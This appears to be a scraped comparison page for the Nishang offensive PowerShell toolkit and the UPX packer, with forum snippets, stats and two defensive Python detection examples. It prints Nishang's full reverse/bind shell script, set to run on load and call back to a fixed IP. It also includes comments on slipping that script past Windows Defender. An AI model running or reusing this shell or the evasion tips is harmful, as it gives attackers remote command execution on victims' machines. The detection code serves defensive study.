nishang
upx
| | nishang | upx |
|---|---|---|
| Mentions | 15 | 30 |
| Stars | 8,336 | 13,395 |
| Growth | - | 2.6% |
| Activity | 0.0 | 9.5 |
| Last commit | 4 days ago | 3 days ago |
| Language | PowerShell | C++ |
| License | GNU General Public License v3.0 or later | GNU General Public License v3.0 or later |
Stars - the number of stars that a project has on GitHub. Growth - month over month growth in stars.
Activity is a relative number indicating how actively a project is being developed. Recent commits have higher weight than older ones.
For example, an activity of 9.0 indicates that a project is amongst the top 10% of the most actively developed projects that we are tracking.
nishang
- PowerShell evasion
- Bypassing Windows Defender (10 Ways)
```powershell
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be listening on the given IP and port.

.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )

    try
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()
            $client = $listener.AcceptTcpClient()
        }

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Read commands from the socket until the peer closes it.
        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target."
                Write-Error $_
            }
            $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}

#Invocation appended to the script body so it runs when the file is loaded.
Invoke-PowerShellTcp -Reverse -IPAddress 172.31.17.142 -Port 80
```
- Powershell scripts suggestions!
- TryHackMe Flatline Walkthrough
Save this file https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
- Discrepancies in detecting obfuscated payloads by Windows Defender?
After that I expanded my research and tried a payload from GitHub user samratashok and followed this guide, in which only the text encoding method is altered from ASCII to UTF8. And guess what? It actually worked: Windows Defender does not detect it!
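The comment above reports that changing only the text encoding of the Nishang script is enough to slip past detection. The Python below is an added example, not code from the thread and not a description of how Windows Defender actually matches this script; it contrasts a literal-string signature with a structural check over three constructed script bodies: the published ASCII form, the UTF8 variant, and a benign TCP health-check client. The indicator names and regexes are this example's own choices.

```python
import re

# Constructed sample script bodies (not real captures). ORIGINAL mirrors the
# socket/decode/eval lines of Invoke-PowerShellTcp; VARIANT is the same script
# with the encoder swapped; BENIGN opens a socket but never evaluates input.
ORIGINAL = (
    "$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)\n"
    "$stream = $client.GetStream()\n"
    "$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding\n"
    "$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String)\n"
)
VARIANT = ORIGINAL.replace("ASCIIEncoding", "UTF8Encoding")
BENIGN = (
    "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5', 443)\n"
    "$stream = $client.GetStream()\n"
    "$writer = New-Object System.IO.StreamWriter($stream)\n"
    "$writer.WriteLine('HEALTHCHECK')\n"
)

# A brittle signature: one literal line lifted from the published script.
BRITTLE_SIGNATURE = "New-Object -TypeName System.Text.ASCIIEncoding"

# Structural indicators: each names a capability rather than a literal line.
# Opening a raw TCP client, reading its stream and handing the bytes to
# Invoke-Expression is a shell no matter which decoder produced the string.
INDICATORS = {
    "tcp_client": re.compile(r"System\.Net\.Sockets\.TcpClient", re.I),
    "stream_io": re.compile(r"\.GetStream\(\)", re.I),
    "text_decoder": re.compile(r"System\.Text\.(ASCII|UTF8|Unicode)Encoding", re.I),
    "eval_input": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
}


def brittle_match(script):
    """Literal-string signature: breaks as soon as one token is edited."""
    return BRITTLE_SIGNATURE in script


def structural_score(script):
    """Return the set of indicator names present in the script text."""
    return {name for name, rx in INDICATORS.items() if rx.search(script)}


def is_reverse_shell(script):
    """Flag only when network I/O and evaluation of received input co-occur."""
    hits = structural_score(script)
    return {"tcp_client", "stream_io", "eval_input"} <= hits


if __name__ == "__main__":
    for label, body in (("original", ORIGINAL), ("variant", VARIANT), ("benign", BENIGN)):
        print(label, "literal:", brittle_match(body), "structural:", is_reverse_shell(body))
```

The decoder indicator is recorded but deliberately not required for the verdict; requiring it is exactly the brittleness the thread demonstrates, since the author only had to change one class name. The benign client trips two of the three required indicators and is still not flagged, which is the false-positive check a detection like this needs before it ships.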
- Using Nishang with Pastebin | Help
- Ideas on how to in-line inspect base64 for malicious code?
- Nishang - offensive PowerShell for #redteam, penetration testing and offensive security 💯
- Writeup: HackTheBox Bounty - Without Metasploit (OSCP Prep)
I am going to copy/paste the following nishang Reverse Shell into the newly created file link.
- Why is this reverse shell not working?
upx
- PicoCTF 2024: packer
According to this source:
- The Trade-Offs of Optimizing and Compressing Go Binaries
Following optimization, tools like UPX can compress the resulting binary, significantly reducing file size. This compression is invaluable for resource-constrained environments but adds a decompression step during binary execution.
- Automatic subtitle translator
- Obfuscation & Executable Compression in Go
I have been using UPX but I'm quite sure if there's something out there that offers better compression.
- My website is one binary
Ah, that's nice. Long ago I used parchment.js to load an inform7-created z5 file on my website. You could try to compress your executable with upx https://upx.github.io/
- Bypassing Windows Defender (10 Ways)
In this process, the given packer tool embeds a natively compiled PE into another executable that contains the information needed to unpack the original content and execute it. Perhaps the most well-known packer, which is not even for malicious purposes, is Golang's UPX package.
- How do you guys deal with protecting source code for your game when launch into steam or mobile platform?
Rewrite in C#, and use an obfuscator on the DLL. You can also write some parts in C++ as many variable and function names are forgotten when compiling. You should also encrypt the PCK, and see if you can embed it. If it's embedded, you can make it more annoying to deal with by packing it with https://upx.github.io/
- Encrypted file in OneDrive Personal Vault Detected as Ransomware.
Another good example of false positives like this would be binaries that are compressed with UPX - the way it works is apparently very similar to how stub-loader malware operates and signature detection tools will flag it as malicious.
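The packer description under "Bypassing Windows Defender (10 Ways)" and the false-positive comment just above both come down to how a packed PE is laid out on disk: the original image is stored compressed, and a small stub inflates it into an empty section at runtime. The Python below is an added example, not code from either post and not part of the UPX project; it walks a PE section table and reports the layout artefacts a signature engine keys on. The `build_pe` fixture, the section names and the sizes are constructed for the example rather than taken from a real binary.

```python
import struct


def build_pe(names, virtual_sizes, raw_sizes, tail=b""):
    """Construct a minimal PE image: DOS stub, PE signature, COFF header and a
    section table, with no optional header and no section data. This is a
    constructed test fixture, not a loadable executable."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, 0, 0)
    table = b""
    for name, vsize, rsize in zip(names, virtual_sizes, raw_sizes):
        # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData,
        # PointerToRawData, PointerToRelocations, PointerToLinenumbers,
        # NumberOfRelocations, NumberOfLinenumbers, Characteristics
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"),
                             vsize, 0, rsize, 0, 0, 0, 0, 0, 0)
    return dos_header + b"PE\x00\x00" + coff + table + tail


def parse_sections(data):
    """Walk the section table; return name, VirtualSize and SizeOfRawData per section."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        name, vsize, _vaddr, rsize = struct.unpack_from("<8sIII", data, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\x00").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": rsize,
        })
    return sections


def upx_indicators(data):
    """Return the reasons a file looks UPX-packed (empty list if none)."""
    sections = parse_sections(data)
    reasons = []
    upx_named = [s["name"] for s in sections if s["name"].startswith("UPX")]
    if upx_named:
        reasons.append("UPX section names: " + ", ".join(upx_named))
    if b"UPX!" in data:
        reasons.append("UPX! magic string present")
    # The unpack target has no bytes on disk but a large virtual size; this is
    # the same shape a stub loader leaves, which is why it draws signatures.
    hollow = [s["name"] for s in sections if s["raw_size"] == 0 and s["virtual_size"] > 0]
    if hollow:
        reasons.append("zero-raw-size sections filled at runtime: " + ", ".join(hollow))
    return reasons


# Constructed fixtures: a UPX-style layout and a plain compiler layout.
PACKED = build_pe(["UPX0", "UPX1", ".rsrc"],
                  [0x20000, 0x8000, 0x1000], [0, 0x8000, 0x1000], tail=b"UPX!")
NORMAL = build_pe([".text", ".rdata", ".data"],
                  [0x4000, 0x1000, 0x800], [0x4000, 0x1000, 0x800])

if __name__ == "__main__":
    for label, blob in (("packed", PACKED), ("normal", NORMAL)):
        print(label, upx_indicators(blob) or "no packer indicators")
```

The section names and the `UPX!` string are cosmetic and are routinely patched out, so a check that stops at them is as brittle as the literal-string PowerShell signature discussed earlier on this page; the hollow-section shape survives renaming and is the signal worth keeping. For triage of a flagged file whose headers are intact, `upx -d` restores the original image, which is usually a faster way to settle a false positive than arguing with the scanner.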
- REST API in RUST with ntex
This will optimise the release binary to be as small as possible. Additionally, with upx we can create a really small docker image!
- help packing sound in <4k
Then I compressed it with upx, cp small.exe smallUpx.exe && upx --brute smallUpx.exe, and got a 10752-byte executable, half the size, but still pretty large.
What are some alternatives?
powershell-universal - PowerShell Universal is the ultimate platform for building web-based IT tools.
rust - Empowering everyone to build reliable and efficient software.
AdminToolbox - Repository for the AdminToolbox PowerShell Modules
rust-sdl2 - SDL2 bindings for Rust
ConPtyShell - ConPtyShell - Fully Interactive Reverse Shell for Windows
legion - High performance Rust ECS library
psPAS - PowerShell module for CyberArk Privileged Access Security REST API
Lean and Mean Docker containers - Slim(toolkit): Don't change anything in your container image and minify it by up to 30x (and for compiled languages even more) making it secure too! (free and open source)
universal-dashboard - Build beautiful websites with PowerShell.
distroless - 🥑 Language focused docker images, minus the operating system.
PoshC2 - A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
fpm - Effing package management! Build packages for multiple platforms (deb, rpm, etc) with great ease and sanity.